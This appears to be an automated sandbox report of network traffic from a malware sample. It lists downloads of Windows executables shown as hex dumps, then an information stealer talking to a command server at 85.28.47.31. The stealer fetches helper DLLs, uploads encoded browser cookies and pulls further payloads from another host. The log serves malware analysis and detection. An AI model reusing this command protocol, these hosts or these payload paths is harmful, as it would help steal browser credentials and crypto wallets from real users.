Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 
00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 18:09:17 GMTContent-Type: application/octet-streamContent-Length: 1898496Last-Modified: Fri, 26 Jul 2024 17:32:44 GMTConnection: keep-aliveETag: "66a3ddbc-1cf800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 d0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4b 00 00 04 00 00 f0 a2 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c bb 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc ba 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 
ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 7a 65 71 62 78 65 73 00 e0 19 00 00 e0 30 00 00 de 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 67 67 68 75 6f 7a 63 00 10 00 00 00 c0 4a 00 00 04 00 00 00 d2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4a 00 00 22 00 00 00 d6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:09:19 GMT Content-Type: application/octet-stream Content-Length: 1909760 Last-Modified: Fri, 26 Jul 2024 17:32:08 GMT Connection: keep-alive ETag: "66a3dd98-1d2400" Accept-Ranges: bytes Data Raw: [PE executable (MZ header); hex dump omitted]
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:05 GMT Content-Type: application/octet-stream Content-Length: 250880 Last-Modified: Fri, 26 Jul 2024 17:47:55 GMT Connection: keep-alive ETag: "66a3e14b-3d400" Accept-Ranges: bytes Data Raw: [PE executable (MZ header); hex dump omitted]
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:08 GMT Content-Type: application/octet-stream Content-Length: 91648 Last-Modified: Fri, 26 Jul 2024 17:31:31 GMT Connection: keep-alive ETag: "66a3dd73-16600" Accept-Ranges: bytes Data Raw: [PE executable (MZ header); hex dump omitted]
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 85.28.47.31 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB Host: 85.28.47.31 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------AFHDAKJKFCFBGCBGDHCB Content-Disposition: form-data; name="hwid" 0374A030FCBF1079209047 ------AFHDAKJKFCFBGCBGDHCB Content-Disposition: form-data; name="build" sila ------AFHDAKJKFCFBGCBGDHCB--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGC Host: 85.28.47.31 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------KEHJKJDGCGDAKFHIDBGC Content-Disposition: form-data; name="token" 1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f ------KEHJKJDGCGDAKFHIDBGC Content-Disposition: form-data; name="message" browsers ------KEHJKJDGCGDAKFHIDBGC--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFID Host: 85.28.47.31 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------GIEHJDHCBAEHJJJKKFID Content-Disposition: form-data; name="token" 1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f ------GIEHJDHCBAEHJJJKKFID Content-Disposition: form-data; name="message" plugins ------GIEHJDHCBAEHJJJKKFID--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBK Host: 85.28.47.31 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------CBKJJEHCBAKFBFHJKFBK Content-Disposition: form-data; name="token" 1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f ------CBKJJEHCBAKFBFHJKFBK Content-Disposition: form-data; name="message" fplugins ------CBKJJEHCBAKFBFHJKFBK--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIIEGDBKJKEBGCBAFCF Host: 85.28.47.31 Content-Length: 7291 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAK Host: 85.28.47.31 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------DGIJEGHDAECAKECAFCAK Content-Disposition: form-data; name="token" 1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f ------DGIJEGHDAECAKECAFCAK Content-Disposition: form-data; name="file_name" Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0 ------DGIJEGHDAECAKECAFCAK Content-Disposition: form-data; name="file" Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHCBAFIDAECBGCBFHJE Host: 85.28.47.31 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------IEHCBAFIDAECBGCBFHJE Content-Disposition: form-data; name="token" 1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f ------IEHCBAFIDAECBGCBFHJE Content-Disposition: form-data; name="file_name" c21qbGxteW1sYnpxLnB3ZA== ------IEHCBAFIDAECBGCBFHJE Content-Disposition: form-data; name="file" ------IEHCBAFIDAECBGCBFHJE--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKEHIEBKJKFIEBGDGDAA Host: 85.28.47.31 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------KKEHIEBKJKFIEBGDGDAA Content-Disposition: form-data; name="token" 1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f ------KKEHIEBKJKFIEBGDGDAA Content-Disposition: form-data; name="file_name" c21qbGxteW1sYnpxLnB3ZA== ------KKEHIEBKJKFIEBGDGDAA Content-Disposition: form-data; name="file" ------KKEHIEBKJKFIEBGDGDAA--
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDGCAEBFIIECAKFHIJE Host: 85.28.47.31 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCG Host: 85.28.47.31 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------IIEBGIDAAFHIJJJJEGCG Content-Disposition: form-data; name="token" 1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f ------IIEBGIDAAFHIJJJJEGCG Content-Disposition: form-data; name="message" wallets ------IIEBGIDAAFHIJJJJEGCG--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGH Host: 85.28.47.31 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------GCAKKECAEGDGCBFIJEGH Content-Disposition: form-data; name="token" 1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f ------GCAKKECAEGDGCBFIJEGH Content-Disposition: form-data; name="message" ybncbhylepme ------GCAKKECAEGDGCBFIJEGH--
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/enter.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
